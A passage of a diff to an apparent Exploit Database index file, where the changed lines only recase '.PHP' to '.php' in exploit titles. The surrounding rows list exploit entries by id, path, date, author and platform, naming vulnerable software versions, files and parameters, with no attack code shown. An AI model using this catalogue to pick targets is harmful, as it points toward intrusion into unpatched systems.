Showflat.PHP SQL Injection Vulnerability",2006-01-29,k-otik,php,webapps,0 -27165,platforms/php/webapps/27165.txt,"Beehive Forum 0.6.2 Index.PHP SQL Injection Vulnerability",2005-12-22,trueend5,php,webapps,0 +27164,platforms/php/webapps/27164.txt,"UBB.Threads 6.3 Showflat.php SQL Injection Vulnerability",2006-01-29,k-otik,php,webapps,0 +27165,platforms/php/webapps/27165.txt,"Beehive Forum 0.6.2 Index.php SQL Injection Vulnerability",2005-12-22,trueend5,php,webapps,0 27166,platforms/php/webapps/27166.txt,"EyeOS 0.8.x Session Remote Command Execution Vulnerability",2006-02-07,"James Bercegay",php,webapps,0 -27167,platforms/php/webapps/27167.txt,"MyBB 1.0.3 Moderation.PHP SQL Injection Vulnerability",2006-02-07,imei,php,webapps,0 +27167,platforms/php/webapps/27167.txt,"MyBB 1.0.3 Moderation.php SQL Injection Vulnerability",2006-02-07,imei,php,webapps,0 27168,platforms/qnx/local/27168.txt,"QNX 6.2/6.3 - Multiple Local Privilege Escalation and Denial of Service Vulnerabilities",2006-02-07,anonymous,qnx,local,0 27169,platforms/asp/webapps/27169.txt,"Webeveyn Whomp! Real Estate Manager 2005 Login SQL Injection Vulnerability",2006-02-08,night_warrior771,asp,webapps,0 -27170,platforms/php/webapps/27170.txt,"vwdev Index.PHP SQL Injection Vulnerability",2006-02-08,"Omid Aghababaei",php,webapps,0 +27170,platforms/php/webapps/27170.txt,"vwdev Index.php SQL Injection Vulnerability",2006-02-08,"Omid Aghababaei",php,webapps,0 27171,platforms/multiple/dos/27171.txt,"Sun ONE Directory Server 5.2 - Remote Denial of Service Vulnerability",2006-02-08,"Evgeny Legerov",multiple,dos,0 -27172,platforms/php/webapps/27172.txt,"SPIP 1.8.2 Spip_RSS.PHP Remote Command Execution Vulnerability",2006-02-08,rgod,php,webapps,0 -27173,platforms/php/webapps/27173.txt,"CPAINT 1.3/2.0 TYPE.PHP Cross-Site Scripting Vulnerability",2006-02-08,"James Bercegay",php,webapps,0 +27172,platforms/php/webapps/27172.txt,"SPIP 1.8.2 Spip_RSS.php Remote Command Execution Vulnerability",2006-02-08,rgod,php,webapps,0 +27173,platforms/php/webapps/27173.txt,"CPAINT 1.3/2.0 TYPE.php Cross-Site Scripting Vulnerability",2006-02-08,"James Bercegay",php,webapps,0 27174,platforms/asp/webapps/27174.txt,"GA's Forum Light - Archive.ASP SQL Injection Vulnerability",2006-02-07,Dj_Eyes,asp,webapps,0 -27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 Index.PHP SQL Injection Vulnerability",2006-02-09,papipsycho,php,webapps,0 +27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 Index.php SQL Injection Vulnerability",2006-02-09,papipsycho,php,webapps,0 27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 Showtopic SQL Injection Vulnerability",2006-03-06,Mr.SNAKE,php,webapps,0 @@ -24319,20 +24319,20 @@ id,file,description,date,author,platform,type,port 27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 index.php bgcol Parameter XSS",2006-02-11,zjieb,php,webapps,0 27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 upload.php Unrestricted File Upload",2006-02-11,zjieb,php,webapps,0 -27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - Search.PHP Q Parameter Cross-Site Scripting Vulnerability",2006-02-12,Kiki,php,webapps,0 +27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - Search.php Q Parameter Cross-Site Scripting Vulnerability",2006-02-12,Kiki,php,webapps,0 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 Class SQL Injection Vulnerability",2006-02-13,"GulfTech Security",php,webapps,0 27203,platforms/hardware/remote/27203.pl,"Fortinet FortiGate 2.x/3.0 URL Filtering Bypass Vulnerability",2006-02-13,"Mathieu Dessus",hardware,remote,0 27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 change_password.php Current Password Weakness",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 login.php check_login() Function Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 u2u.php username Parameter XSS",2006-02-13,"James Bercegay",php,webapps,0 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 -27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - Header.PHP Pagetitle Parameter Cross-Site Scripting Vulnerability",2006-02-13,"Janek Vind",php,webapps,0 +27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - Header.php Pagetitle Parameter Cross-Site Scripting Vulnerability",2006-02-13,"Janek Vind",php,webapps,0 27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting Vulnerability",2006-02-13,"Micha Borrmann",php,webapps,0 27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String DoS",2006-02-14,ZwelL,multiple,dos,0 27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple Malformed Field DoS",2006-02-14,ZwelL,multiple,dos,0 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 LDAP Memory Corruption Vulnerability",2006-02-14,"Evgeny Legerov",multiple,dos,0 -27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 - Search.PHP Cross-Site Scripting Vulnerability",2006-02-14,Citynova,php,webapps,0 -27214,platforms/php/webapps/27214.txt,"DeltaScripts PHP Classifieds 6.20 Member_Login.PHP SQL Injection Vulnerability",2006-02-14,"Audun Larsen",php,webapps,0 +27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 - Search.php Cross-Site Scripting Vulnerability",2006-02-14,Citynova,php,webapps,0 +27214,platforms/php/webapps/27214.txt,"DeltaScripts PHP Classifieds 6.20 Member_Login.php SQL Injection Vulnerability",2006-02-14,"Audun Larsen",php,webapps,0 27215,platforms/php/webapps/27215.txt,"sNews - Comment Body XSS",2006-02-14,joffer,php,webapps,0 27216,platforms/php/webapps/27216.txt,"sNews - index.php Multiple Parameter SQL Injection",2006-02-14,joffer,php,webapps,0 27217,platforms/php/webapps/27217.txt,"Dotproject 2.0 - /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 @@ -24344,7 +24344,7 @@ id,file,description,date,author,platform,type,port 27223,platforms/php/webapps/27223.txt,"Dotproject 2.0 /modules/public/calendar.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27224,platforms/php/webapps/27224.txt,"Dotproject 2.0 /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27225,platforms/php/webapps/27225.txt,"Dotproject 2.0 /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 PMLite.PHP SQL Injection Vulnerability",2006-02-14,"Hamid Ebadi",php,webapps,0 +27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 PMLite.php SQL Injection Vulnerability",2006-02-14,"Hamid Ebadi",php,webapps,0 27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection Vulnerability",2006-02-15,imei,php,webapps,0 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 view_all_set.php Multiple Parameter XSS",2006-02-15,"Thomas Waldegger",php,webapps,0 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 manage_user_page.php sort Parameter XSS",2006-02-15,"Thomas Waldegger",php,webapps,0 @@ -24354,33 +24354,33 @@ id,file,description,date,author,platform,type,port 27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 chopSAPLog.dsp fullName Variable Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 deleteSingle fullName Variable Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 adapter-index.dsp url Variable Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 -27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - Private.PHP Multiple SQL Injection Vulnerabilities",2006-02-15,imei,php,webapps,0 +27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - Private.php Multiple SQL Injection Vulnerabilities",2006-02-15,imei,php,webapps,0 27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 HTML Injection Vulnerability",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 -27238,platforms/php/webapps/27238.php,"DreamCost HostAdmin 3.0 Index.PHP Remote File Include Vulnerability",2006-02-16,ReZEN,php,webapps,0 +27238,platforms/php/webapps/27238.php,"DreamCost HostAdmin 3.0 Index.php Remote File Include Vulnerability",2006-02-16,ReZEN,php,webapps,0 27239,platforms/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injection Vulnerabilities",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 -27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 Managegroup.PHP SQL Injection Vulnerability",2006-02-16,imei,php,webapps,0 +27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 Managegroup.php SQL Injection Vulnerability",2006-02-16,imei,php,webapps,0 27241,platforms/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 HTTPD Denial of Service Vulnerability",2006-02-16,l0om,hardware,dos,0 -27242,platforms/php/webapps/27242.txt,"MyBB 1.0.3 Managegroup.PHP Cross-Site Scripting Vulnerability",2006-02-16,imei,php,webapps,0 -27243,platforms/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 Page.PHP HTML Injection Vulnerability",2006-02-16,federico.alice@tiscali.it,php,webapps,0 +27242,platforms/php/webapps/27242.txt,"MyBB 1.0.3 Managegroup.php Cross-Site Scripting Vulnerability",2006-02-16,imei,php,webapps,0 +27243,platforms/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 Page.php HTML Injection Vulnerability",2006-02-16,federico.alice@tiscali.it,php,webapps,0 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 Text File Overwrite Weakness",2006-02-16,ReZEN,linux,remote,0 27245,platforms/php/webapps/27245.txt,"V-webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,php,webapps,0 27246,platforms/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 Address Book Import Remote Denial of Service Vulnerability",2006-02-17,DrFrancky,linux,dos,0 27247,platforms/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin HTML Injection Vulnerability",2006-02-18,"marc & shb",php,webapps,0 27248,platforms/php/webapps/27248.txt,"Webpagecity WPC easy - SQL Injection Vulnerability",2006-02-18,murfie,php,webapps,0 27249,platforms/php/webapps/27249.html,"PHP-Nuke 7.x - CAPTCHA Bypass Weakness",2006-02-18,waraxe,php,webapps,0 -27250,platforms/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 Edituser.PHP Access Validation Vulnerability",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 -27251,platforms/php/webapps/27251.txt,"Magic Calendar Lite 1.02 Index.PHP SQL Injection Vulnerability",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 -27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 Show_News.PHP Cross-Site Scripting Vulnerability",2006-02-20,imei,php,webapps,0 +27250,platforms/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 Edituser.php Access Validation Vulnerability",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 +27251,platforms/php/webapps/27251.txt,"Magic Calendar Lite 1.02 Index.php SQL Injection Vulnerability",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 +27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 Show_News.php Cross-Site Scripting Vulnerability",2006-02-20,imei,php,webapps,0 27253,platforms/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 HTML Parsing Denial of Service Vulnerability",2006-02-21,"Yuan Qi",linux,dos,0 27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module language Parameter XSS",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 -27256,platforms/php/webapps/27256.txt,"RunCMS 1.x Ratefile.PHP Cross-Site Scripting Vulnerability",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 +27256,platforms/php/webapps/27256.txt,"RunCMS 1.x Ratefile.php Cross-Site Scripting Vulnerability",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 27257,platforms/linux/dos/27257.html,"Multiple Mozilla Products IFRAME JavaScript Execution Vulnerabilit",2006-02-22,"Georgi Guninski",linux,dos,0 27258,platforms/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service Vulnerability",2006-02-22,"Josh Zlatin-Amishav",asp,dos,0 -27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0 +27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection Vulnerability",2006-02-22,trueend5,php,webapps,0 27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Include Vulnerability",2006-02-22,trueend5,php,webapps,0 -27262,platforms/php/webapps/27262.txt,"Noah's Classifieds 1.0/1.3 Index.PHP Remote File Include Vulnerability",2006-02-22,trueend5,php,webapps,0 +27262,platforms/php/webapps/27262.txt,"Noah's Classifieds 1.0/1.3 Index.php Remote File Include Vulnerability",2006-02-22,trueend5,php,webapps,0 27263,platforms/php/webapps/27263.txt,"Dragonfly CMS 9.0.6 1 - Your_Account Module Multiple Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27264,platforms/php/webapps/27264.txt,"Dragonfly CMS 9.0.6 1 - News Module Multiple Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27265,platforms/php/webapps/27265.txt,"Dragonfly CMS 9.0.6.1 - Stories_Archive Module Multiple Parameter XSS",2006-02-22,Lostmon,php,webapps,0 @@ -24388,7 +24388,7 @@ id,file,description,date,author,platform,type,port 27267,platforms/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 - Surveys Module Multiple Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27268,platforms/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 - Downloads Module c Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27269,platforms/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 - Coppermine Module album Parameter XSS",2006-02-22,Lostmon,php,webapps,0 -27494,platforms/php/webapps/27494.txt,"PHPmyfamily 1.4.1 Track.PHP Cross-Site Scripting Vulnerability",2006-03-28,matrix_killer,php,webapps,0 +27494,platforms/php/webapps/27494.txt,"PHPmyfamily 1.4.1 Track.php Cross-Site Scripting Vulnerability",2006-03-28,matrix_killer,php,webapps,0 27495,platforms/php/webapps/27495.txt,"phpCOIN 1.2 mod_print.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0 27496,platforms/php/webapps/27496.txt,"phpCOIN 1.2 mod.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector CMD Install Service Vulnerability (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 @@ -24417,12 +24417,12 @@ id,file,description,date,author,platform,type,port 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure livelog.html Arbitrary Command Execution",2013-08-02,metasploit,unix,remote,7443 27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,metasploit,windows,local,0 27297,platforms/lin_amd64/local/27297.c,"Linux Kernel <= 3.7.6 (Redhat) (32bit/64bit) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,lin_amd64,local,0 -27298,platforms/php/webapps/27298.txt,"Web Calendar Pro Dropbase.PHP SQL Injection Vulnerability",2006-02-23,ReZEN,php,webapps,0 +27298,platforms/php/webapps/27298.txt,"Web Calendar Pro Dropbase.php SQL Injection Vulnerability",2006-02-23,ReZEN,php,webapps,0 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 error.php html_error_occurred Parameter XSS",2006-02-23,rgod,php,webapps,0 27300,platforms/php/webapps/27300.txt,"NOCC 1.0 filter_prefs.php html_filter_select Parameter XSS",2006-02-23,rgod,php,webapps,0 27301,platforms/php/webapps/27301.txt,"NOCC 1.0 no_mail.php html_no_mail Parameter XSS",2006-02-23,rgod,php,webapps,0 27302,platforms/php/webapps/27302.txt,"NOCC 1.0 html_bottom_table.php Multiple Parameter XSS",2006-02-23,rgod,php,webapps,0 -27303,platforms/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 Index.PHP SQL Injection Vulnerability",2006-02-23,h4cky0u,php,webapps,0 +27303,platforms/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 Index.php SQL Injection Vulnerability",2006-02-23,h4cky0u,php,webapps,0 27304,platforms/php/webapps/27304.html,"CubeCart 3.0.x - Arbitrary File Upload Vulnerability",2006-02-23,"NSA Group",php,webapps,0 27305,platforms/php/webapps/27305.txt,"PHPX 3.5.9 XCode Tag HTML Injection Vulnerability",2006-02-23,"Thomas Pollet",php,webapps,0 27306,platforms/php/webapps/27306.txt,"JGS-Gallery 4.0 jgs_galerie_slideshow.php Multiple Parameter XSS",2006-02-23,nuker,php,webapps,0 @@ -24430,14 +24430,14 @@ id,file,description,date,author,platform,type,port 27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - reviews.php letter Parameter XSS",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - download.php dcategory Parameter XSS",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 Failure.ASP Cross-Site Scripting Vulnerability",2006-02-25,rUnViRuS,asp,webapps,0 -27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 Scan_Lang_Insert.PHP Local File Include Vulnerability",2006-02-25,"NSA Group",php,webapps,0 +27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 Scan_Lang_Insert.php Local File Include Vulnerability",2006-02-25,"NSA Group",php,webapps,0 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload Vulnerability",2006-02-25,"NSA Group",php,webapps,0 27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 basket.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 cat.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow Exploit (SEH)",2013-08-03,sagi-,windows,local,0 27317,platforms/windows/dos/27317.txt,"StarUML WinGraphviz.dll - ActiveX Buffer Overflow Vulnerability",2013-08-03,d3b4g,windows,dos,0 -27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 Mainfile.PHP SQL Injection Vulnerability",2006-02-25,waraxe,php,webapps,0 +27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 Mainfile.php SQL Injection Vulnerability",2006-02-25,waraxe,php,webapps,0 27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0 27320,platforms/hardware/remote/27320.txt,"Thomson SpeedTouch 500 Series LocalNetwork Page name Parameter XSS",2006-02-25,"Preben Nylokken",hardware,remote,0 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection Vulnerability",2006-02-27,SAUDI,php,webapps,0 @@ -24452,20 +24452,20 @@ id,file,description,date,author,platform,type,port 27330,platforms/php/webapps/27330.txt,"n8cms 1.1/1.2 index.php Multiple Parameter SQL Injection",2006-02-27,Liz0ziM,php,webapps,0 27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 index.php Multiple Parameter XSS",2006-02-27,Liz0ziM,php,webapps,0 27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 mailto.php userid Parameter XSS",2006-02-27,Liz0ziM,php,webapps,0 -27333,platforms/php/webapps/27333.txt,"QwikiWiki 1.4 Index.PHP Cross-Site Scripting Vulnerability",2006-02-28,Dr^Death,php,webapps,0 +27333,platforms/php/webapps/27333.txt,"QwikiWiki 1.4 Index.php Cross-Site Scripting Vulnerability",2006-02-28,Dr^Death,php,webapps,0 27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function additional_parameters - Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 -27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 Inc_header.PHP Cross-Site Scripting Vulnerability",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 +27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 Inc_header.php Cross-Site Scripting Vulnerability",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0 -27338,platforms/php/webapps/27338.txt,"PEHEPE Membership Management System 3.0 - Sol_menu.PHP Cross-Site Scripting Vulnerability",2006-02-26,"Yunus Emre Yilmaz",php,webapps,0 +27338,platforms/php/webapps/27338.txt,"PEHEPE Membership Management System 3.0 - Sol_menu.php Cross-Site Scripting Vulnerability",2006-02-26,"Yunus Emre Yilmaz",php,webapps,0 27339,platforms/php/webapps/27339.txt,"PEHEPE Membership Management System 3.0 - Remote PHP Script Code Injection Vulnerability",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27340,platforms/php/webapps/27340.txt,"SMBlog 1.2 - Arbitrary PHP Command Execution Vulnerability",2006-03-01,botan,php,webapps,0 -27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 Poems.PHP SQL Injection Vulnerability",2006-03-02,sherba,php,webapps,0 -27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 forgotten_password.PHP SQL Injection Vulnerability",2006-03-02,"Hamid Ebadi",php,webapps,0 -27343,platforms/php/webapps/27343.txt,"VBulletin 3.0/3.5 Profile.PHP Email Field HTML Injection Vulnerability",2006-03-02,imei,php,webapps,0 +27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 Poems.php SQL Injection Vulnerability",2006-03-02,sherba,php,webapps,0 +27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 forgotten_password.php SQL Injection Vulnerability",2006-03-02,"Hamid Ebadi",php,webapps,0 +27343,platforms/php/webapps/27343.txt,"VBulletin 3.0/3.5 Profile.php Email Field HTML Injection Vulnerability",2006-03-02,imei,php,webapps,0 27344,platforms/php/webapps/27344.txt,"NZ Ecommerce System - index.php Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Include Vulnerability",2006-03-02,botan,php,webapps,0 -27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 Show.PHP MainID SQL Injection Vulnerability",2006-03-04,Mr.SNAKE,php,webapps,0 +27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 Show.php MainID SQL Injection Vulnerability",2006-03-04,Mr.SNAKE,php,webapps,0 27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 comment.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 contact.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 27349,platforms/php/webapps/27349.txt,"phpArcadeScript 2.0 tellafriend.php gamename Parameter XSS",2006-03-04,Retard,php,webapps,0 @@ -24474,13 +24474,13 @@ id,file,description,date,author,platform,type,port 27352,platforms/php/webapps/27352.txt,"phpArcadeScript 2.0 browse.php Multiple Parameter XSS",2006-03-04,Retard,php,webapps,0 27353,platforms/php/webapps/27353.txt,"phpArcadeScript 2.0 displaygame.php gamefile Parameter XSS",2006-03-04,Retard,php,webapps,0 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 New User Image File HTML Injection Vulnerability",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 -27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 Misc.PHP Cross-Site Scripting Vulnerability",2006-03-04,r57shell,php,webapps,0 +27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 Misc.php Cross-Site Scripting Vulnerability",2006-03-04,r57shell,php,webapps,0 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 Title Field HTML Injection Vulnerability",2006-03-06,Kiki,php,webapps,0 -27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x Common.PHP Remote File Include Vulnerability",2006-03-06,ERNE,php,webapps,0 -27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 Login.PHP Cross-Site Scripting Vulnerability",2006-03-06,Retard,php,webapps,0 +27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x Common.php Remote File Include Vulnerability",2006-03-06,ERNE,php,webapps,0 +27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 Login.php Cross-Site Scripting Vulnerability",2006-03-06,Retard,php,webapps,0 27365,platforms/multiple/dos/27365.txt,"Monopd 0.9.3 - Remote Denial of Service Vulnerability",2006-03-06,"Luigi Auriemma",multiple,dos,0 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link HTML Injection Vulnerability",2006-04-01,s3rv3r_hack3r,php,webapps,0 -27367,platforms/php/webapps/27367.txt,"Link Bank Iframe.PHP Cross-Site Scripting Vulnerability",2006-03-07,Retard,php,webapps,0 +27367,platforms/php/webapps/27367.txt,"Link Bank Iframe.php Cross-Site Scripting Vulnerability",2006-03-07,Retard,php,webapps,0 27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 podcast.php id Parameter SQL Injection",2006-03-07,tzitaroth,php,webapps,0 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 index.php template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 backend_settings.php language Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 @@ -24525,28 +24525,28 @@ id,file,description,date,author,platform,type,port 27410,platforms/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 login.php Multiple Parameter XSS",2006-03-10,Kiki,php,webapps,0 27411,platforms/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 pageindex.php help Parameter XSS",2006-03-10,Kiki,php,webapps,0 27412,platforms/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 recentchanges.php help Parameter XSS",2006-03-10,Kiki,php,webapps,0 -27413,platforms/php/webapps/27413.txt,"Core News 2.0.1 Index.PHP Remote Code Execution Vulnerability",2006-03-10,botan,php,webapps,0 -27414,platforms/php/webapps/27414.txt,"vCard 2.8/2.9 Create.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,php,webapps,0 +27413,platforms/php/webapps/27413.txt,"Core News 2.0.1 Index.php Remote Code Execution Vulnerability",2006-03-10,botan,php,webapps,0 +27414,platforms/php/webapps/27414.txt,"vCard 2.8/2.9 Create.php Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,php,webapps,0 27415,platforms/php/webapps/27415.txt,"WMNews - wmview.php ArtCat Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 27416,platforms/php/webapps/27416.txt,"WMNews - footer.php ctrrowcol Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 27417,platforms/php/webapps/27417.txt,"WMNews - wmcomments.php ArtID Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 27418,platforms/windows/dos/27418.txt,"Firebird 